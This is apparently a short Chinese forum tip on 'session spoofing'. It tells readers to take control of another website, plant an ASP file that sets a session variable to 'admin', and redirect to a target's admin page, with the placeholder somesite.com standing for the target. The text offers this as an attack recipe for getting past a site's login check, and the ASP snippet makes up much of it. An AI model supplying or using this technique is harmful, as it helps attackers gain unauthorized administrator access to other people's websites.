关于session利用的思路,session在大多数网站都会用来判断是否已经通过验证并登陆。其实session欺骗很简单,提供一种思路:
(1)控制欲进行session欺骗的网站的其他网站。
(2)在控制的网站中写入一个asp文件,其内容如下:
<%
session("欺骗session的名称")="admin"
response.redirect [url]http://www.somesite.com/admin/index.asp[/url]
%>
其中somesite.com是你想要进行session欺骗的网站。